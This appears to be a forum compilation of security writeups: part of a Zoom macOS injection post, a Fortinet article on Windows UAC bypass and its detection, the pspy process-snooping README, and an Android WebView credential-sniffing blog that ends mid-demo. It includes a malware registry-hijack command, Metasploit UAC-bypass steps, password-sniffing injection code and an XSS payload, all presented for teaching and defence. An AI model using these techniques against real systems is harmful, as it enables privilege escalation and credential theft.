    📝 Could malware (ab)use Zoom to capture audio and video at arbitrary times (i.e. to spy on users?). If Zoom is installed and has been granted access to the mic and camera, then yes!

    In fact the /usr/bin/open utility supports the -j flag, which “launches the app hidden”!

    Voila!

    Conclusion

    Today, we uncovered two (local) security issues affecting Zoom’s macOS application. Given Zoom’s privacy and security track record this should surprise absolutely zero people.

    First, we illustrated how unprivileged attackers or malware may be able to exploit Zoom’s installer to gain root privileges.

    Following this, due to an ‘exception’ entitlement, we showed how to inject a malicious library into Zoom’s trusted process context. This affords malware the ability to record all Zoom meetings, or, simply spawn Zoom in the background to access the mic and webcam at arbitrary times! 😱

    The former is problematic as many enterprises (now) utilize Zoom for (likely) sensitive business meetings, while the latter is problematic as it affords malware the opportunity to surreptitiously access either the mic or the webcam, with no macOS alerts and/or prompts.

    OSX.FruitFly v2.0 anybody?

    fruitfly.png

    So, what to do? Honestly, if you care about your security and/or privacy perhaps stop using Zoom. And if using Zoom is a must, I’ve written several free tools that may help detect these attacks. 😇

    First, OverSight can alert you anytime anybody accesses the mic or webcam:

    oversight.png

    Thus even if an attacker or malware is (ab)using Zoom “invisibly” in the background, OverSight will generate an alert.

    Another (free) tool is KnockKnock that can generically detect proxy libraries:

    knockknock.png

    …it’s almost as if offensive cyber-security research can facilitate the creation of powerful defensive tools! 🛠️ 😇

     
    ❤️ Love these blog posts and/or want to support my research and tools?

    You can support them via my Patreon page!

     

    Sursa: https://objective-see.com/blog/blog_0x56.html

  4. Offense and Defense – A Tale of Two Sides: Bypass UAC

    By Anthony Giandomenico | April 01, 2020
     

    FortiGuard Labs Threat Analysis

    Introduction

    In this month’s “Offense and Defense – A Tale of Two Sides” blog, we will be walking through a new technique in sequence as it would happen in a real attack. Since I discussed downloading and executing a malicious payload with PowerShell last time, the next logical step is to focus on a technique for escalating privileges, which is why we will be focusing on the Bypass User Account Control (UAC) attack technique. Once the bad guys have managed to breach defenses and get into a system, they need to make sure they have the right permissions to complete whatever their tasks might be. One of the first obstacles they typically face is trying to bypass the UAC.

    It’s important to note that, while very common, Bypass UAC is a much weaker version of a Local Privilege Escalation attack. There are much more sophisticated exploits in the wild that allow for sandbox escapes, or for gaining privileged system access from a device owned by a least-privileged user. But we will save those other topics for another day. 

    User Account Control Review 

    Before we start, we will all need a basic understanding of how UAC works. UAC is an access control feature introduced with Microsoft Windows Vista and Windows Server 2008 (and is included in pretty much all Windows versions after that). The main intent of UAC is to make sure applications are limited to standard user privileges. If a user requires an increase in access privileges, the administrator of the device (usually the owner) needs to authorize that change by actively selecting a prompt-based query. We all should be familiar with this user experience. 

    When additional privileges are needed, a pop-up prompt asks, “Do you want to allow the following program to make changes to this computer?” If you have the full access token (i.e. you are logged in as the administrator of the device, or if you are part of the administrator’s group), you can select ‘yes’, and be on your way. If you’ve been assigned a standard user access token, however, you will be prompted to enter credentials for an administrator who does have the privileges.

    Figure 1. UAC Consent Prompt Figure 1. UAC Consent Prompt
    Figure 2. UAC Credential Prompt Figure 2. UAC Credential Prompt

    NOTE: When you first log in to a Windows 10 machine as a non-admin user, you are granted a standard access token. This token contains information about the level of access you are being granted, including SIDs and Windows privileges. The login process for an administrator is similar. They get the same standard token as the non-admin user, but they also get an additional token that provides admin access. This explains why an administrative user is still prompted with the UAC consent prompt even though they have appropriate access privilege. It’s because the system looks at the standard access token first. If you give your consent by selecting yes, the admin access token kicks in and you are on your merry way.

    The goal for this feature was that it would limit accidental system changes and malware from compromising a system, since elevating privilege required an additional user intervention to verify that this change is what the user was intending to do, and that only trusted apps would receive admin privileges.

    One other item that is important to understand is that Windows 10 protects processes by marking them with certain integrity levels. Below are the highest and lowest integrity levels. 

    • High Integrity (Highest) – apps that are assigned this level can make modifications to system data. Some executables may have auto-elevate abilities. I will dive into this later.
    • Low Integrity (Lowest) - apps that perform a task that could be harmful to the operating system

    There is much more information available out there for the UAC feature, but I think what we have covered gives us the background we need to proceed.

    Bypass User Account Control 

    The UAC feature seems like a good measure for preventing malware from compromising a system. But unfortunately, it turns out that criminals have discovered ways to bypass the UAC feature, many of which are pretty trivial. Many of them depend on the specific configuration setting of UAC. Below are a few examples of UAC bypass techniques that have been built into the open-source Metasploit tool to help you test your systems.

    • UAC protection bypass using Fodhelper and the Registry Key
    • UAC protection bypass using Eventvwr and the Registry Key 
    • UAC protection bypass using COM Handler Hijack

    The first two take advantage of auto-elevation within Windows. If a binary is trusted – meaning it has been signed with a MS certificate and is located in a trusted directory, like c:\windows\system32 – the UAC consent prompt will not engage. Both Fodhelper.exe and Eventvwr.exe are trusted binaries. In the Fodhelper example, when that executable is run it looks for two registry keys to run additional commands. One of those registry keys can be modified, so if you put custom commands in there, they run at the privilege level of the trusted fodhelper.exe file.

    It’s worth mentioning that these techniques only work if the user is already in the administrator group. If you’re on a system as a standard user, it will not work. You might ask yourself, “why do I need to perform this bypass if I’m already an admin?” The answer is that if the adversary is on the box remotely, how do they select the yes button when the UAC consent prompt appears? They can’t, so the only way around it is to get around the prompt itself.

    The COM handler bypass is similar, as it references specific registry (COM handler) entries that can be created and then referenced when a high integrity process is loaded. On a side note, if you want to see which executables can auto-elevate, try using the strings program, which is part of Sysinternals:

    Example: strings -s c:\windows\system32\*.exe | findstr /i autoelevate
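    For illustration only, here is a rough, cross-platform Python sketch of that strings-plus-findstr pipeline (my own example, not from the original article; the directory you would really scan is c:\windows\system32). It checks each executable for the autoElevate marker, trying both the UTF-8 and UTF-16-LE encodings a Windows manifest may use:

```python
import pathlib

def find_autoelevate(exe_dir):
    """Return names of .exe files whose bytes contain an 'autoElevate' marker."""
    hits = []
    for path in sorted(pathlib.Path(exe_dir).glob("*.exe")):
        data = path.read_bytes()
        # embedded manifests may be stored as UTF-8 or UTF-16-LE, so check both
        if b"autoElevate" in data or "autoElevate".encode("utf-16-le") in data:
            hits.append(path.name)
    return hits
```

    Note this is a plain substring match, so (like the strings | findstr approach) it can flag binaries that merely mention autoElevate; it is an enumeration aid, not proof a binary auto-elevates.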

    As I mentioned, there are many more bypass UAC techniques. If you want to explore more, which I think you should do to ensure you’re protected against them, or at least can detect them, you can start at this GitHub site (UACMe).

    Defenses against Bypass UAC 

    Now that we understand that bypassing the UAC controls is possible, let’s talk about defenses you have against these attacks. You have four settings for User Account Control in Windows 7/10. The settings options are listed below.

    • Always notify       
      • Probably the most secure setting. If you select this, it will always notify you when you make changes to your system, such as installing software programs or when you are making direct changes to Windows settings. When the UAC prompt is displayed, other tasks are frozen until you respond.
    • Notify me only when programs try to make changes to my computer
      • This setting is similar to the first. It will notify when installing software programs and will freeze all other tasks until you respond to the prompt. However, it will not notify you when you try to modify changes to the system. 
    • Notify me only when programs try to make changes to my computer (do not dim my desktop) 
      • As the setting name suggests, it’s the same as the one above. But when the UAC consent prompt appears, other tasks on the system will not freeze. 
    • Never notify (Disable UAC)
      • I think it’s obvious what this setting does. It disables User Access Control. 

    The default setting for UAC is “Notify me only when programs try to make changes to my computer.” I mention this because some attack techniques will not work if you have UAC set to “Always notify.” A word to the wise.

    Another great defense for this technique is to simply not run as administrator. Even if you own the device, work as a standard user and elevate privileges as needed when performing tasks that require them. This sounds like a no-brainer, but many organizations still provide admin privileges to all users. The reasoning is usually because it’s easier. That’s true, but it’s also easier for the bad guys as well.

    Privilege escalation never really happens as a single event. It is multiple techniques chained together, with each dependent on the successful execution of the one before it. So with that in mind, the best way to break the attack chain is to prevent any of these techniques from successfully completing, and the best place to do this is usually by blocking a technique in the execution tactic category, or earlier, when it is being delivered. If the adversary cannot get a foothold on the box, they certainly are not going to be able to execute a bypass UAC technique.

    If you’re interested in learning more about technique chaining and dependencies, Andy Applebaum gave a nice presentation at the FIRST Conference that you might want to take a look at. 

    One common question people ask is, “why are there no CVEs for these UAC security bypass attacks?” It’s because Microsoft doesn’t consider UAC to be a security boundary, so you will not see them in the regular Patch Tuesdays. 

    Real-World Examples & Detections 

    Over the years, our FortiGuard Labs team has discovered many threats that include a bypass UAC technique. A great example is a threat we discovered a few years back that contained the Fareit malware. A Fareit payload typically includes stealing credentials and downloading other payloads. This particular campaign was delivered via a phishing email containing a malicious macro that called a PowerShell script to download a file named sick.exe. This seems like a typical attack strategy, but to execute the sick.exe payload it used the high integrity (auto-elevated) eventvwr.exe to bypass the UAC consent prompt. Below is the PowerShell script.

    Figure 3. PowerShell Script Figure 3. PowerShell Script

    You can see that the first part of the script downloads the malicious file using the (New-object System.net.webclient).Downloadfile() method we discussed in the first blog in this series. The second part of the script adds an entry to the registry using the command reg add HKCU\Software\Classes\mscfile\shell\open\command /d %tmp%\sick.exe /f.

    Figure 4. Registry Modified by PowerShell Script Figure 4. Registry Modified by PowerShell Script

    Finally, the last command in the script runs the eventvwr.exe, which needs to run MMC. As I discussed earlier, the exe has to query both the HKCU\Software\Classes\mscfile\shell\open\command\ and HKCR\mscfile\shell\open\command\. When it does so, it will find sick.exe as an entry and will execute that instead of the MMC.

    Our 24/7 FortiResponder Managed Detection and Response team also sees a good amount of bypass UAC activity in our customers’ environments. Usually, the threat is stopped earlier in the attack chain, before it has a chance to run the technique, but there are occasions when it is able to progress beyond that point. We also observe it if the FortiEDR configuration is in simulation mode. 

    A recent technique we detected and blocked was a newer version of Trickbot. When this payload runs it tries to execute the WSReset UAC Bypass technique to circumvent the UAC prompt. Once again, it leverages an executable that has higher integrity (and higher privilege) and has the autoElevate property enabled. This specific bypass works on Windows 10. If the payload encounters Windows 7, it will instead use the CMSTPUA UAC bypass technique. In Figure 5 you can see our FortiEDR forensic technology identify the reg.exe trying to modify the registry value with DelegateExecute. 

    Figure 5. FortiEDR technology detecting a bypass UAC technique Figure 5. FortiEDR technology detecting a bypass UAC technique

    Our FortiSIEM customers can take advantage of rules to detect some of these UAC bypass techniques. Below is an example rule to detect a UAC bypass using the Windows backup tool sdclt.exe and the Eventvwr version we mentioned before.

    Figure 6. FortiSIEM rule to detect some Bypass UAC techniques Figure 6. FortiSIEM rule to detect some Bypass UAC techniques

    Below, in Figure 7, we can see the sub-patterns for the rule detecting the eventvwr Bypass UAC version. 

    Figure 7. FortiSIEM SubPattern to detect Bypass UAC technique using eventvwr.exe Figure 7. FortiSIEM SubPattern to detect Bypass UAC technique using eventvwr.exe

    If you’re not using a technology like FortiEDR or FortiSIEM, you could start monitoring on your own (using sysmon). But again, it could be difficult since there are so many variations. In general, you can look for registry changes or additions in certain areas, and for the auto-elevated files being used, depending on the specific bypass UAC technique. For the eventvwr.exe version you could look for new entries in HKCU\Software\Classes. Also keep an eye on the consent.exe file, since it’s the one that launches the user interface for UAC. Look at the amount of time between the start and the end of the consent process. If it’s milliseconds, it’s not being done by a human but by an automated process. Lastly, when looking at the entire UAC process, a legitimate execution is usually much simpler in nature, whereas the bypass UAC process is a bit more complex or noisy in the logs. 

    You will have to do a lot of research to figure out the right rules to trigger on. It’s probably better to just get a technology that can help prevent or detect the technique. 

    This should save you a lot of time and personnel overhead.

    Reproducing the Techniques 

    Once you’ve done your research on the technique, it’s time to figure out how to reproduce it so you can figure out whether or not you detect it. Some of the same tools apply as I mentioned last time, but there are a few that are fairly easy to use. Below are a few examples.

    Simulation Tool

    Atomic Red Team has some very basic tests you can use to simulate a UAC bypass. Figure 8, below, lists them.

    Figure 8. A list of Bypass UAC tests Figure 8. A list of Bypass UAC tests

    Open Source Defense Testing Tool 

    As I mentioned earlier, Metasploit has a few bypass UAC techniques you can leverage. Remember that in the attack chain your adversary already has an initial foothold on the box, and they are trying to get around UAC. With that said, you should already have a meterpreter session running on your test box. Executing the steps to run a bypass UAC (using fodhelper) technique is pretty simple.

    First, put your meterpreter session in the background by typing the command background. Next, type use exploit/windows/local/bypassuac_fodhelper. From there you need to add your meterpreter session to use the exploit. Type in set session <your session #> and then type exploit. If you’re successful, you should have something on your screen that looks like what’s shown in figure 9, below.

    Figure 9. Successful bypass UAC using fodhelper file. Figure 9. Successful bypass UAC using fodhelper file.

    Lastly, in video 1 below, I walk you through a bypass UAC technique available in Metasploit. I had established initial access and ended up with a meterpreter session. From there I tried to add a registry entry for persistence, but didn’t have the right access. So, I tried to run the getsystem command, but that failed as well. This is usually because UAC is enabled. I then selected one of the bypass UAC techniques, which allowed me to elevate my system privilege and add my persistence into the registry.

    Conclusion

    Once again, we continue to play the cat and mouse game. As an industry we build protections (in this case UAC) and eventually the adversary finds ways around them. This will most likely not change. So the important task is understanding your strengths and weaknesses against these real-world attacks. If you struggle with keeping up to date with all of this, you can always turn to your consulting partner or vendor to make sure you have the right security controls and services in place to keep up with the latest threats, and that you are also able to address the risk and identify malicious activities using such tools as EDR, MDR, UEBA, and SIEM technologies. 

    I will close this blog like I did last time. As you go through the process of testing each Bypass UAC attack technique, it is important to not only understand the technique, but also be able to simulate it. Then, monitor your security controls, evaluate if any gaps exist, and document and make improvements needed for coverage.

     Stay tuned for our next Mitre ATT&CK technique blog - Credential Dumping. 

    Find out more about how FortiResponder Services enable organizations to achieve continuous monitoring as well as incident response and forensic investigation.

    Learn how FortiGuard Labs provides unmatched security and intelligence services using integrated AI systems.

    Find out about the FortiGuard Security Services portfolio and sign up for our weekly FortiGuard Threat Brief.

    Discover how the FortiGuard Security Rating Service provides security audits and best practices to guide customers in designing, implementing, and maintaining the security posture best suited for their organization.

     

    Sursa: https://www.fortinet.com/blog/threat-research/offense-and-defense-a-tale-of-two-sides-bypass-uac.html

  5. pspy - unprivileged Linux process snooping


    pspy is a command line tool designed to snoop on processes without the need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate to your colleagues why passing secrets as arguments on the command line is a bad idea.

    The tool gathers the info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.

    Getting started

    Download

    Get the tool onto the Linux machine you want to inspect. First get the binaries. Download the released binaries here:

    • 32 bit big, static version: pspy32 download
    • 64 bit big, static version: pspy64 download
    • 32 bit small version: pspy32s download
    • 64 bit small version: pspy64s download

    The statically compiled files should work on any Linux system but are quite huge (~4MB). If size is an issue, try the smaller versions which depend on libc and are compressed with UPX (~1MB).

    Build

    Either use Go installed on your system, or run the Docker-based build process that was used to create the release. For the latter, ensure Docker is installed, and then run make build-build-image to build a Docker image, followed by make build to build the binaries with it.

    You can run pspy --help to learn about the flags and their meaning. The summary is as follows:

    • -p: enables printing commands to stdout (enabled by default)
    • -f: enables printing file system events to stdout (disabled by default)
    • -r: list of directories to watch with Inotify. pspy will watch all subdirectories recursively (by default, watches /usr, /tmp, /etc, /home, /var, and /opt).
    • -d: list of directories to watch with Inotify. pspy will watch these directories only, not the subdirectories (empty by default).
    • -i: interval in milliseconds between procfs scans. pspy scans regularly for new processes regardless of Inotify events, just in case some events are not received.
    • -c: print commands in different colors. File system events are not colored anymore, commands have different colors based on process UID.
    • --debug: prints verbose error messages which are otherwise hidden.

    The default settings should be fine for most applications. Watching files inside /usr is most important since many tools will access libraries inside it.

    Some more complex examples:

    # print both commands and file system events and scan procfs every 1000 ms (=1sec)
    ./pspy64 -pf -i 1000 
    
    # place watchers recursively in two directories and non-recursively into a third
    ./pspy64 -r /path/to/first/recursive/dir -r /path/to/second/recursive/dir -d /path/to/the/non-recursive/dir
    
    # disable printing discovered commands but enable file system events
    ./pspy64 -p=false -f

    Examples

    Cron job watching

    To see the tool in action, just clone the repo and run make example (Docker needed). It is well known that passing passwords as command line arguments is not safe, and the example can be used to demonstrate this. The command starts a Debian container in which a secret cron job, run by root, changes a user password every minute. pspy runs in the foreground, as user myuser, and scans for processes. You should see output similar to this:

    ~/pspy (master) $ make example
    [...]
    docker run -it --rm local/pspy-example:latest
    [+] cron started
    [+] Running as user uid=1000(myuser) gid=1000(myuser) groups=1000(myuser),27(sudo)
    [+] Starting pspy now...
    Watching recursively    : [/usr /tmp /etc /home /var /opt] (6)
    Watching non-recursively: [] (0)
    Printing: processes=true file-system events=false
    2018/02/18 21:00:03 Inotify watcher limit: 524288 (/proc/sys/fs/inotify/max_user_watches)
    2018/02/18 21:00:03 Inotify watchers set up: Watching 1030 directories - watching now
    2018/02/18 21:00:03 CMD: UID=0    PID=9      | cron -f
    2018/02/18 21:00:03 CMD: UID=0    PID=7      | sudo cron -f
    2018/02/18 21:00:03 CMD: UID=1000 PID=14     | pspy
    2018/02/18 21:00:03 CMD: UID=1000 PID=1      | /bin/bash /entrypoint.sh
    2018/02/18 21:01:01 CMD: UID=0    PID=20     | CRON -f
    2018/02/18 21:01:01 CMD: UID=0    PID=21     | CRON -f
    2018/02/18 21:01:01 CMD: UID=0    PID=22     | python3 /root/scripts/password_reset.py
    2018/02/18 21:01:01 CMD: UID=0    PID=25     |
    2018/02/18 21:01:01 CMD: UID=???  PID=24     | ???
    2018/02/18 21:01:01 CMD: UID=0    PID=23     | /bin/sh -c /bin/echo -e "KI5PZQ2ZPWQXJKEL\nKI5PZQ2ZPWQXJKEL" | passwd myuser
    2018/02/18 21:01:01 CMD: UID=0    PID=26     | /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root
    2018/02/18 21:01:01 CMD: UID=101  PID=27     |
    2018/02/18 21:01:01 CMD: UID=8    PID=28     | /usr/sbin/exim4 -Mc 1enW4z-00000Q-Mk

    First, pspy prints all currently running processes, each with PID, UID and the command line. When pspy detects a new process, it adds a line to this log. In this example, you find a process with PID 23 which seems to change the password of myuser. This is the result of a Python script used in root's private crontab /var/spool/cron/crontabs/root, which executes this shell command (check crontab and script). Note that myuser can neither see the crontab nor the Python script. With pspy, it can see the commands nevertheless.

    CTF example from Hack The Box

    Below is an example from the machine Shrek from Hack The Box. In this CTF challenge, the task is to exploit a hidden cron job that's changing ownership of all files in a folder. The vulnerability is the insecure use of a wildcard together with chmod (details for the interested reader). It requires substantial guesswork to find and exploit it. With pspy though, the cron job is easy to find and analyse:

    animated demo gif

    How it works

    Tools exist to list all processes executed on Linux systems, including those that have finished. For instance there is forkstat. It receives notifications from the kernel on process-related events such as fork and exec.

    These tools require root privileges, but that should not give you a false sense of security. Nothing stops you from snooping on the processes running on a Linux system. A lot of information is visible in procfs as long as a process is running. The only problem is you have to catch short-lived processes in the very short time span in which they are alive. Scanning the /proc directory for new PIDs in an infinite loop does the trick but consumes a lot of CPU.
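    That naive /proc scanning loop can be sketched in a few lines of Python (a simplified illustration of the idea; pspy itself is written in Go and works differently in the details):

```python
import os

def list_procs():
    """Snapshot of running processes: {pid: command line}, read from procfs."""
    procs = {}
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue  # skip non-process entries like /proc/meminfo
        try:
            with open(f"/proc/{entry}/cmdline", "rb") as f:
                # argv entries are NUL-separated in procfs
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            procs[int(entry)] = cmdline
        except OSError:
            pass  # process exited between listdir() and open()
    return procs

def diff_new(before, after):
    """Return the processes that appeared between two snapshots."""
    return {pid: cmd for pid, cmd in after.items() if pid not in before}
```

    Calling list_procs() in a tight loop and printing diff_new() between consecutive snapshots catches new processes, at the price of the CPU cost described above.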

    A stealthier way is to use the following trick. Processes tend to access files such as libraries in /usr, temporary files in /tmp, log files in /var, ... Using the inotify API, you can get notifications whenever these files are created, modified, deleted, accessed, etc. Linux does not require privileged users for this API since it is needed for many innocent applications (such as text editors showing you an up-to-date file explorer). Thus, while non-root users cannot monitor processes directly, they can monitor the effects of processes on the file system.
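    The unprivileged-inotify trick can be demonstrated from Python via ctypes (Linux only; a minimal sketch of the mechanism, not pspy's code, and it only handles the single-event case):

```python
import ctypes
import os
import struct

IN_CREATE = 0x00000100  # mask value from <sys/inotify.h>

# libc is already mapped into the Python process; no special privileges needed
libc = ctypes.CDLL(None, use_errno=True)

def wait_for_create(directory):
    """Block until a file is created in `directory`; return the file's name."""
    fd = libc.inotify_init()
    libc.inotify_add_watch(fd, directory.encode(), IN_CREATE)
    try:
        buf = os.read(fd, 4096)
        # struct inotify_event { int wd; uint32_t mask, cookie, len; char name[]; }
        _wd, _mask, _cookie, name_len = struct.unpack_from("iIII", buf, 0)
        return buf[16:16 + name_len].rstrip(b"\0").decode()
    finally:
        os.close(fd)
```

    In pspy, events like these merely act as triggers for a /proc rescan; the sketch just shows that an unprivileged process receives them.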

    We can use the file system events as a trigger to scan /proc, hoping that we can do it fast enough to catch the processes. This is what pspy does. There is no guarantee you won't miss one, but chances seem to be good in my experiments. In general, the longer the processes run, the bigger the chance of catching them is.

    Misc

    Logo: "By Creative Tail [CC BY 4.0 (http://creativecommons.org/licenses/by/4.0)], via Wikimedia Commons" (link)

     

    Sursa: https://github.com/DominicBreuker/pspy

  6. Android Webview Exploited

    How an android app can bypass CSP, iframe sandbox attributes, etc. to compromise the page getting loaded in the webview despite the classic protections in place.

    qreoct

    24 Mar 2020 20 min read

    There are plenty of articles explaining the security issues with android webview, like this article & this one. Many of these resources talk about the risks that an untrusted page, loaded inside a webview, poses to the underlying app. The threats become especially prominent when javascript and/or the javascript interface is enabled on the webview.

    In short, having javascript enabled & not properly fortified allows for execution of arbitrary javascript in the context of the loaded page, making it quite similar to any other page that may be vulnerable to an XSS. And again, very simply put, having the javascript interface enabled allows for potential code execution in the context of the underlying android app.

    In many of the resources that I came across, the situation was such that the victim was the underlying android app, inside whose webview a page would open either from its own domain or from an external source/domain. The attacker was an entity external to the app, like an actor exploiting a potential XSS on the page loaded from the app's domain (or the third-party domain from which the page is loaded, itself acting maliciously). The attack vector was the vulnerable/malicious page loaded in the webview.

    This blog talks about a different attack scenario!

    Victim: Not the underlying android app, but the page itself that is being loaded in the webview.

    Attacker: The underlying android app, in whose webview the page is being loaded.

    Attack vector: The vulnerable/malicious page loaded in the webview (through the abuse of insecure implementations of some APIs)

    The story line

    A certain product needs to integrate with a huge business. Let us call the huge business BullyGiant & the product AppAwesome from this point on.

    Many users have an account on both AppAwesome & BullyGiant. The flow involves such BullyGiant users checking out on their payments page with AppAwesome. Every transaction on AppAwesome needs to be authenticated & authorized by the user by entering their password on AppAwesome's checkout page, which appears before any transaction is allowed to go through.

    AppAwesome cares about the security of its customers. So it proposes the below security measures to anyone who wants to integrate with it, especially around AppAwesome's checkout page.

    1. Loading of the checkout page using AppAwesome's SDK. All of the page & its contents are sandboxed & controlled by the SDK. This approach allows for maximum security & the best user experience.
    2. Loading of the checkout page in the underlying browser (or custom Chrome tabs, if available). This approach again has quite decent security (limited, of course, by the underlying browser's security) but not a very good user experience.
    3. Loading of the checkout page in the webview of the integrating app. This is comparatively the most insecure of the above proposals, although it offers a better user experience than the second approach.

    Now the deal is that AppAwesome is very keen on securing its own customers' financial data & hence very strongly recommends usage of its SDK. BullyGiant, on the other hand, for some reason (hopefully justified), does not really want to abide by AppAwesome's secure integration proposals. AppAwesome does have the choice to deny any integration with BullyGiant. However, this integration is really crucial for AppAwesome to provide a superior user experience to its own users & in fact even more crucial for AppAwesome to stay in the game.

    So AppAwesome gives in & agrees to integrate with BullyGiant, succumbing to its terms of integration, i.e. using the least secure webview approach. The only thing that protects AppAwesome's customers now is the trust that AppAwesome has in BullyGiant, which is somewhat also covered through the legal contracts between the two. That's all.

    Technical analysis (TL;DR)

    Thanks: Badshah & Anoop for helping with the execution of the attack idea. Without your help, this blog post would not have been possible, at least not while it's still relevant :)

    Below is a technical analysis of why webview is a bad idea. It talks about how a spurious (or compromised) app can abuse webview features to extract sensitive data from the page loaded inside the webview, despite the many security mechanisms that the page might have implemented. We discuss in detail, with many demos, how CSP, iframe sandbox, etc. may be bypassed in an android webview. Every single demo has a linked code base on my Github so they can be tried out first hand. Also, the below generic scheme is followed (not strictly in that order) throughout the blog:

    1. A simple demo of the underlying concepts on the browser & android webview
    2. Addition of security features to the underlying concepts & then demo of the same on the browser & android webview
    NB: Please ignore all other potential security issues that might be there with the code base/s

    Case 1: No protection mechanisms

    Apps used in this section:

    1. AppAwesome
    2. BullyGiant

    AppAwesome when accessed from a normal browser:

    ss3.png Vanilla AppAwesome Landing Page - Browser

    And on submitting the above form:

    ss4.png Vanilla AppAwesome Checkout Page -Browser

    AppAwesome when accessed from BullyGiant app:

    screen1-2.png Vanilla AppAwesome Page - Android Webview

    Notice the Authenticate Payment web page is loaded inside a webview of the BullyGiant app.

    And on submitting the form above:

    scree2.png Vanilla AppAwesome Page - Android Webview

    Notice that clicking on the Submit button also displays the content of the password field as a toast message on BullyGiant. This proves how the underlying app may be able to sniff any data (sensitive or otherwise) from the page loaded in its webview.

    Under the BullyGiant hood

    BullyGiant is able to sniff the password field out of the webview because it is in total control of its own webview & hence can change the webview's properties, listen to events, etc. That is exactly what it is doing. It is

    1. enabling javascript on its webview &
    2. then listening for the onPageFinished event

    Snippet from BullyGiant:

        ...
        final WebView mywebview = (WebView) findViewById(R.id.webView);
        mywebview.clearCache(true);
        mywebview.loadUrl("http://192.168.1.38:31337/home");
        mywebview.getSettings().setJavaScriptEnabled(true);
        mywebview.setWebChromeClient(new WebChromeClient());
        mywebview.addJavascriptInterface(new AppJavaScriptProxy(this), "androidAppProxy");
        mywebview.setWebViewClient(new WebViewClient(){
            @Override
            public void onPageFinished(WebView view, String url) {...}
        ...

    Note that there is addJavascriptInterface as well. This is what many blogs (quoted in the beginning of this blog) talk about, where the loaded web page can potentially be harmful to the underlying app. In our use case, however, it is not of much consequence (from that perspective). All that it is used for is to show that BullyGiant can read the contents of the page loaded in the webview. It does so by sending the read content back to android (that's where addJavascriptInterface is used) & having it displayed as a toast message.

    The other important bit in the BullyGiant code base is the overridden onPageFinished():

        ...
        super.onPageFinished(view, url);
        mywebview.loadUrl("javascript:var button = document.getElementsByName(\"submit\")[0];button.addEventListener(\"click\", function(){ androidAppProxy.showMessage(\"Password : \" + document.getElementById(\"password\").value); return false; },false);");
        ...
    

    That's where the javascript to read the password field from the DOM is injected into the page loaded inside the webview.

    The story line continued...

    AppAwesome came up with the below solutions to prevent the web page from being read by the underlying app:

    Suggestion #1: Use CSP

    Use CSP to prevent BullyGiant from executing any javascript whatsoever inside the page loaded in the webview

    Suggestion #2: Use Iframe Sandbox

    Load the sensitive page inside of an iframe on the main page in the webview. Use iframe sandbox to restrict any interactions between the parent window/page & the iframe content.

    CSP is a mechanism to prevent execution of untrusted javascript inside a web page, while the sandbox attribute of iframe is a way to tighten the controls on the page within an iframe. Both are very well explained in many resources like here.
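    For concreteness, the policy enforced in the demos below (it shows up verbatim in the later console errors) is a single response header that restricts script sources to the page's own origin & the demo server's address:

```
Content-Security-Policy: script-src 'self' http://192.168.1.35:31337
```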

    With all the above restrictions imposed, our goal now would be to see if BullyGiant can still access the AppAwesome page loaded inside the webview or not. We would go about analyzing how each of the suggested solutions work in a normal browser & in a webview & how could BullyGiant access the loaded pages if at all.

    Exploring CSP With Inline JS

    Apps used in this section:

    1. AppAwesome
    2. BullyGiant

    Before moving on to the demo of the CSP implementation & its effects on Android Webview, let's look at how a non-CSP page behaves in a normal (non-webview) browser & in a webview.

    To demo this we have added an inline JS snippet that alerts 1 on clicking the submit button, before proceeding to the checkout success page. AppAwesome code snippet:

    <!DOCTYPE HTML>
        ...
        <script type="text/javascript">
          function f(){
            alert(1);
          }
        </script>
        ...
      <input type="submit" value="Submit" name="submit" onclick="f();">
        ...
    </html>
    

    AppAwesome when accessed from the browser & when Submit button is clicked:

    ss7.png Vanilla AppAwesome Page - Inline JS => Firefox 74.0

    AppAwesome when accessed from BullyGiant app:

    ss8.png Vanilla AppAwesome Page - Inline JS => Android Webview

    The above suggests that so far there is no change in how the page is treated by the 2 environments. Now let's check the change in behavior (if at all) when CSP headers are implemented.

    With CSP Implemented

    Apps used in this section:

    1. AppAwesome
    2. BullyGiant

    Browser

    A quick demo of these features on a traditional browser (not webview) suggests that these controls are indeed useful (when implemented the right way) with what they are intended for.

    AppAwesome when accessed from a browser:

    ss5.png CSP AppAwesome page - Inline JS => Firefox 74.0

    Notice the Content Security Policy violations. These violations happen because of the CSP response headers, returned by the backend & enforced by the browser.

    Response headers from AppAwesome:

    ss6-1.png CSP AppAwesome page - Inline JS => Firefox 74.0

    Android Webview

    AppAwesome when accessed from BullyGiant gives the same Authenticate Payment page as above & the exact same CSP errors too! This can be seen from the below screenshot of a remote debugging session taken from Chrome 80.0:

    (Firefox was not chosen for remote debugging because I was lazy to set up remote debugging on Firefox. Firefox set up on the AVD was required too :( as per this from the FF settings page. Also further down for all the demos we use adb logs instead of remote debugging sessions to show browser console messages)

    ss9.png On Google Chrome 80.0

    Hence, we see that CSP does prevent execution of inline JS inside android webview, very much like a normal browser does.

    Exploring CSP With Injected JS

    Apps used in this section:

    1. AppAwesome
    2. AppAwesome (with XSS-Auditor disabled)
    3. BullyGiant (without XSS payload)
    4. BullyGiant (with XSS payload)

    AppAwesome has been made deliberately vulnerable to a reflected XSS through a query parameter, name, added to the home page. Also, all inline JS has been removed from this page to further emphasize CSP's impact on injected JS.

    AppAwesome when accessed from the browser while the name query parameter's value is John Doe:

    ss10.png On Google Chrome 80.0

    Now, for the sake of the demo, we would exploit the XSS vulnerable name query param to add an onclick event to the Submit button such that clicking it would alert "injected 1"

    XSS exploit payload

    <body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}</script>
    

    AppAwesome when accessed from the browser & exploited with the above payload (in name query parameter):

    ss11.png Vanilla AppAwesome Page - Exploited XSS => Firefox

    AppAwesome when accessed from BullyGiant, without exploiting the XSS:

    ss12.png Vanilla AppAwesome Page - Vulnerable param => Android Webview

    AppAwesome when accessed from BullyGiant, while attempting to exploit the XSS, produces the same screen as above. However, contrary to the script injection that was successful in the case of a normal browser, this time clicking on the Submit button didn't execute the payload at all; we were instead taken directly to the checkout page. The adb logs, however, did produce an interesting message, as shown below:

    ss13.png Vanilla AppAwesome Page - Exploited XSS => Android Webview

    The adb log message is:

